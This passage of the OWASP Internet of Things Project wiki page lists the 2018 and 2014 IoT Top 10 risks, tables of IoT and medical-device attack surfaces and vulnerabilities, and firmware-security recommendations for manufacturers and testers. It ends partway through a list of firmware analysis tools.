The project looks to define a structure for various IoT sub-projects such as Attack Surface Areas, Testing Guides and Top Vulnerabilities.<br />
<br />
==Updated!==<br />
<br />
The OWASP IoT Project for 2018 has just been released!<br />
<br />
[[File:2018 IoT Top10.png|center|thumb|1290x1290px]]<br />
<br />
== Philosophy ==<br />
The OWASP Internet of Things Project was started in 2014 as a way help Developers, Manufacturers, Enterprises, and Consumers to make better decisions regarding the creation and use of IoT systems.<br />
<br />
This continues today with the 2018 release of the OWASP IoT Top 10, which represents the top ten things to avoid when building, deploying, or managing IoT systems. The primary theme for the 2018 OWASP Internet of Things Top 10 is simplicity. Rather than having separate lists for risks vs. threats vs. vulnerabilities—or for developers vs. enterprises vs. consumers—the project team elected to have a single, unified list that captures the top things to avoid when dealing with IoT Security.<br />
<br />
The team recognized that there are now dozens of organizations releasing elaborate guidance on IoT Security—all of which are designed for slightly different audiences and industry verticals. We thought the most useful resource we could create is a single list that addresses the highest priority issues for manufacturers, enterprises, and consumers at the same time.<br />
<br />
The result is the 2018 OWASP IoT Top 10.<br />
<br />
== Methodology ==<br />
The project team is a collection of volunteer professionals from within the security industry, with experience spanning multiple areas of expertise, including: manufacturers, consulting, security testers, developers, and many more.<br />
<br />
The project was conducted in the following phases:<br />
# '''Team Formation''': finding people who would be willing to contribute to the 2018 update, both as SMEs and as project leaders to perform various tasks within the duration of the project.<br />
# '''Project Review:''' analysis of the 2014 project to determine what’s changed in the industry since that release, and how the list should be updated given those changes.<br />
# '''Data Collection''': collection and review of multiple vulnerability sources (both public and private), with special emphasis on which issues caused the most actual impact and damage.<br />
# '''Sister Project Review''': a review of dozens of other IoT Security projects to ensure that we’d not missed something major and that we were comfortable with both the content and prioritization of our release. Examples included: CSA IoT Controls Matrix, CTIA, Stanford’s Secure Internet of Things Project, NISTIR 8200, ENISA IoT Baseline Report, Code of Practice for Consumer IoT Security, and others.<br />
# '''Community Draft Feedback''': release of the draft to the community for review, including multiple Twitter calls for comments, the use of a public feedback form, and a number of public talks where feedback was gathered. The feedback was then reviewed by the team along with initial Data Collection, as well as Sister Project Review, to create the list contents and prioritization.<br />
# '''Release:''' release of the project to the public in December 2018.<br />
<br />
==Licensing==<br />
The OWASP Internet of Things Project is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the OWASP Internet of Things Project? ==<br />
<br />
The OWASP Internet of Things Project provides information on:<br />
<br />
* [https://www.owasp.org/index.php/IoT_Attack_Surface_Areas IoT Attack Surface Areas]<br />
* IoT Vulnerabilities<br />
* Firmware Analysis<br />
* ICS/SCADA Software Weaknesses<br />
* Community Information<br />
* [https://www.owasp.org/index.php/IoT_Testing_Guides IoT Testing Guides]<br />
* [https://www.owasp.org/index.php/IoT_Security_Guidance IoT Security Guidance]<br />
* [https://www.owasp.org/index.php/Principles_of_IoT_Security Principles of IoT Security]<br />
* [https://www.owasp.org/index.php/IoT_Framework_Assessment IoT Framework Assessment]<br />
* Developer, Consumer and Manufacturer Guidance<br />
* Design Principles<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Contributors ==<br />
* [https://www.owasp.org/index.php/User:Justin_C._Klein_Keane Justin Klein Keane]<br />
* Saša Zdjelar<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Project|OWASP Project Repository]]<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security]<br />
* [https://www.owasp.org/index.php/C-Based_Toolchain_Hardening OWASP C-based Toolchain Hardening]<br />
<br />
| style="padding-left:25px;width:200px;" valign="top" |<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The OWASP Slack Channel]<br />
<br />
Hint: If you're new to Slack, [https://lists.owasp.org/pipermail/owasp-community/2015-July/000703.html join OWASP's slack channel first], then join #iot-security within OWASP's channel.<br />
<br />
== Quick Download ==<br />
[https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top Ten 2018]<br />
<br />
[https://1drv.ms/v/s!AucQMYXJNefdwAwa5IPz2cg3cvWe OWASP IoT 2018 Planning Session]<br />
<br />
[https://www.owasp.org/images/7/7b/IoT_Preso_v1.pptx Quick discussion on IoT]<br />
<br />
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping DEFCON 23]<br />
<br />
[https://www.owasp.org/images/2/2d/Iot_testing_methodology.JPG IoT Testing Guidance Handout]<br />
<br />
[https://www.owasp.org/images/7/71/Internet_of_Things_Top_Ten_2014-OWASP.pdf OWASP IoT Top Ten PDF]<br />
<br />
[https://www.owasp.org/images/8/8e/Infographic-v1.jpg OWASP IoT Top Ten Infographic]<br />
<br />
[https://www.owasp.org/images/0/01/Internet_of_Things_Top_Ten_2014-OWASP-ppt.pptx OWASP IoT Top Ten PPT]<br />
<br />
[https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf OWASP IoT Top Ten-RSA 2015]<br />
<br />
[https://www.owasp.org/images/b/bd/OWASP-IoT.pptx OWASP IoT Project Overview]<br />
<br />
== News and Events ==<br />
* [https://1drv.ms/v/s!AucQMYXJNefdwAwa5IPz2cg3cvWe OWASP IoT 2018 Planning Session]<br />
* Added a [https://owasp-iot-security.slack.com/ Slack channel]<br />
* Added a sub-project; [https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project#tab=IoT_Security_Policy_Project IoT Security Policy Project]<br />
* Daniel Miessler gave his [https://www.youtube.com/watch?v=RhxHHD790nw IoT talk at DEFCON 23]<br />
* Migrating the IoT Top Ten to be under the IoT Project<br />
* HP Study Reveals 70 Percent of Internet of Things Devices Vulnerable to Attack<br />
<br />
==Classifications==<br />
<br />
{| width="200" cellpadding="2"<br />
|-<br />
| rowspan="2" width="50%" valign="top" align="center" | [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]<br />
| width="50%" valign="top" align="center" | [[File:Owasp-builders-small.png|link=]] <br />
|-<br />
| width="50%" valign="top" align="center" | [[File:Owasp-defenders-small.png|link=]]<br />
|-<br />
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]<br />
|-<br />
| colspan="2" align="center" | [[File:Project_Type_Files_DOC.jpg|link=]]<br />
|}<br />
<br />
|}<br />
<br />
= IoT Top 10 =<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
== Internet of Things (IoT) Top 10 2018 ==<br />
The [https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top 10 - 2018] is now available.<br />
* I1 Weak Guessable, or Hardcoded Passwords<br />
<br />
* I2 Insecure Network Services<br />
<br />
* I3 Insecure Ecosystem Interfaces<br />
<br />
* I4 Lack of Secure Update Mechanism<br />
<br />
* I5 Use of Insecure or Outdated Components<br />
<br />
* I6 Insufficient Privacy Protection<br />
<br />
* I7 Insecure Data Transfer and Storage<br />
<br />
* I8 Lack of Device Management<br />
<br />
* I9 Insecure Default Settings<br />
<br />
* I10 Lack of Physical Hardening<br />
== Internet of Things (IoT) Top 10 2014 ==<br />
* [[Top 10 2014-I1 Insecure Web Interface|I1 Insecure Web Interface]]<br />
* [[Top 10 2014-I2 Insufficient Authentication/Authorization|I2 Insufficient Authentication/Authorization]]<br />
* [[Top 10 2014-I3 Insecure Network Services|I3 Insecure Network Services]]<br />
* [[Top 10 2014-I4 Lack of Transport Encryption|I4 Lack of Transport Encryption]]<br />
* [[Top 10 2014-I5 Privacy Concerns|I5 Privacy Concerns]]<br />
* [[Top 10 2014-I6 Insecure Cloud Interface|I6 Insecure Cloud Interface]]<br />
* [[Top 10 2014-I7 Insecure Mobile Interface|I7 Insecure Mobile Interface]]<br />
* [[Top 10 2014-I8 Insufficient Security Configurability|I8 Insufficient Security Configurability]]<br />
* [[Top 10 2014-I9 Insecure Software/Firmware|I9 Insecure Software/Firmware]]<br />
* [[Top 10 2014-I10 Poor Physical Security|I10 Poor Physical Security]]<br />
<br />
= IoT Attack Surface Areas =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Attack Surface Areas Project ==<br />
<br />
The OWASP IoT Attack Surface Areas (DRAFT) are as follows:<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
** UART (Serial)<br />
** JTAG / SWD<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure ([[Top 10 2013-A6-Sensitive Data Exposure|See OWASP Top 10 - A6 Sensitive data exposure]]):<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
** Verify for old sw versions and possible attacks (Heartbleed, Shellshock, old PHP versions etc)<br />
* Security related function API exposure<br />
* Firmware downgrade possibility<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* DoS<br />
* Device Firmware OTA update block<br />
* Firmware loaded over insecure channel (no TLS)<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Check for insecure direct object references<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of static same enc/dec key<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-wave, XBee, Zigbee, Bluetooth, LoRA)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Authentication/Authorization related values (session key, token, cookie, etc.) disclosure<br />
* Reusing of session key, token, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Privacy'''<br />
|<br />
* User data disclosure<br />
* User/device location disclosure<br />
* Differential privacy<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physically)<br />
* Damage (Physicall)<br />
<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Attack Surface Areas Project? ==<br />
<br />
The IoT Attack Surface Areas Project provides a list of attack surfaces that should be understood by manufacturers, developers, security researchers, and those looking to deploy or implement IoT technologies within their organizations.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_Mobile_Security_Project The OWASP Mobile Top 10 Project]<br />
* [https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project The OWASP Web Top 10 Project]<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Vulnerabilities =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Vulnerabilities Project ==<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Vulnerability<br />
! Attack Surface<br />
! Summary<br />
|-<br />
| '''Username Enumeration'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to collect a set of valid usernames by interacting with the authentication mechanism<br />
|-<br />
| '''Weak Passwords'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to set account passwords to '1234' or '123456' for example.<br />
* Usage of pre-programmed default passwords<br />
|-<br />
| '''Account Lockout'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to continue sending authentication attempts after 3 - 5 failed login attempts<br />
|-<br />
| '''Unencrypted Services'''<br />
|<br />
* Device Network Services<br />
|<br />
* Network services are not properly encrypted to prevent eavesdropping or tampering by attackers<br />
|-<br />
| '''Two-factor Authentication'''<br />
|<br />
* Administrative Interface<br />
* Cloud Web Interface<br />
* Mobile Application<br />
|<br />
* Lack of two-factor authentication mechanisms such as a security token or fingerprint scanner<br />
|-<br />
| '''Poorly Implemented Encryption'''<br />
|<br />
* Device Network Services<br />
|<br />
* Encryption is implemented however it is improperly configured or is not being properly updated, e.g. using SSL v2 <br />
|-<br />
| '''Update Sent Without Encryption'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Updates are transmitted over the network without using TLS or encrypting the update file itself<br />
|-<br />
| '''Update Location Writable'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Storage location for update files is world writable potentially allowing firmware to be modified and distributed to all users<br />
|-<br />
| '''Denial of Service'''<br />
|<br />
* Device Network Services<br />
|<br />
* Service can be attacked in a way that denies service to that service or the entire device<br />
|-<br />
| '''Removal of Storage Media'''<br />
|<br />
* Device Physical Interfaces<br />
|<br />
* Ability to physically remove the storage media from the device<br />
|-<br />
| '''No Manual Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to manually force an update check for the device<br />
|-<br />
| '''Missing Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to update device<br />
|-<br />
| '''Firmware Version Display and/or Last Update Date'''<br />
|<br />
* Device Firmware<br />
|<br />
* Current firmware version is not displayed and/or the last update date is not displayed<br />
|-<br />
| '''Firmware and storage extraction'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://www.flashrom.org/Flashrom In-Situ dumping]<br />
* Intercepting a OTA update<br />
* Downloading from the manufacturers web page<br />
* [https://www.exploitee.rs/index.php/Exploitee.rs_Low_Voltage_e-MMC_Adapter eMMC tapping]<br />
* Unsoldering the SPI Flash / eMMC chip and reading it in a adapter<br />
|<br />
* Firmware contains a lot of useful information, like source code and binaries of running services, pre-set passwords, ssh keys etc. <br />
|-<br />
| '''Manipulating the code execution flow of the device'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://wiki.newae.com/Main_Page Side channel attacks like glitching]<br />
|<br />
* With the help of a JTAG adapter and gdb we can modify the execution of firmware in the device and bypass almost all software based security controls.<br />
* Side channel attacks can also modify the execution flow or can be used to leak interesting information from the device<br />
|-<br />
| '''Obtaining console access'''<br />
|<br />
* Serial interfaces (SPI / UART)<br />
|<br />
* By connecting to a serial interface, we will obtain full console access to a device<br />
* Usually security measures include custom bootloaders that prevent the attacker from entering single user mode, but that can also be bypassed.<br />
|-<br />
| '''Insecure 3rd party components'''<br />
|<br />
* Software<br />
|<br />
* Out of date versions of busybox, openssl, ssh, web servers, etc.<br />
|-<br />
<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Vulnerabilities Project? ==<br />
<br />
The IoT Vulnerabilities Project provides:<br />
<br />
* Information on the top IoT vulnerabilities<br />
* The attack surface associated with the vulnerability<br />
* A summary of the vulnerability<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/Top_IoT_Vulnerabilities Top 10 IoT Vulnerabilities from 2014]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= Medical Devices =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Medical Device Testing ==<br />
<br />
The Medical Device Testing project is intended to provide some basic attack surface considerations that should be evaluated before shipping Medical Device equipment.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''HL7'''<br />
|<br />
* XML Parsing<br />
** XSS<br />
* Information Disclosure<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure:<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
* Security related function API exposure<br />
* Firmware downgrade<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* DoS<br />
* Device Firmware OTA update block<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of static same enc/dec key<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-wave, XBee, Zigbee, Bluetooth, LoRA)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Authentication/Authorization related values (session key, token, cookie, etc.) disclosure<br />
* Reusing of session key, token, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Data Flow'''<br />
|<br />
* What data is being captured?<br />
* How does it move within the ecosystem?<br />
* How is it protected in transit?<br />
* How is it protected at rest?<br />
* Who is that data shared with?<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physically)<br />
* Damaging (Physically)<br />
* Failure state analysis<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Medical Attack Surfaces project? ==<br />
<br />
The Medical Attack Surfaces project provides:<br />
<br />
* A simple way for testers, manufacturers, developers, and users to get an understanding of the complexity of a modern medical environment<br />
* Allows people to visualize the numerous attack surfaces that need to be defended within medical equipment ecosystems<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Daniel Miessler presented on using Adaptive Testing Methodologies to evaluate the security of medical devices at RSA 2017.<br />
<br />
|}<br />
<br />
= Firmware Analysis =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Firmware Analysis Project ==<br />
<br />
The Firmware Analysis Project is intended to provide security testing guidance for the IoT Attack Surface "Device Firmware":<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Section<br />
! <br />
|- <br />
|<br />
Device Firmware Vulnerabilities<br />
|<br />
* Out-of-date core components<br />
* Unsupported core components<br />
* Expired and/or self-signed certificates<br />
* Same certificate used on multiple devices<br />
* Admin web interface concerns<br />
* Hardcoded or easy to guess credentials<br />
* Sensitive information disclosure<br />
* Sensitive URL disclosure<br />
* Encryption key exposure<br />
* Backdoor accounts<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
|-<br />
|<br />
Manufacturer Recommendations<br />
|<br />
* Ensure that supported and up-to-date software is used by developers<br />
* Ensure that robust update mechanisms are in place for devices<br />
* Ensure that certificates are not duplicated across devices and product lines.<br />
* Ensure supported and up-to-date software is used by developers<br />
* Develop a mechanism to ensure a new certificate is installed when old ones expire<br />
* Disable deprecated SSL versions<br />
* Ensure developers do not code in easy to guess or common admin passwords<br />
* Ensure services such as SSH have a secure password created<br />
* Develop a mechanism that requires the user to create a secure admin password during initial device setup<br />
* Ensure developers do not hard code passwords or hashes<br />
* Have source code reviewed by a third party before releasing device to production<br />
* Ensure industry standard encryption or strong hashing is used<br />
|-<br />
|<br />
Device Firmware Guidance and Instruction<br />
|<br />
* Firmware file analysis<br />
* Firmware extraction<br />
* Dynamic binary analysis<br />
* Static binary analysis<br />
* Static code analysis<br />
* Firmware emulation<br />
* File system analysis<br />
|-<br />
|<br />
Device Firmware Tools<br />
|<br />
* [https://github.com/craigz28/firmwalker Firmwalker] <br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
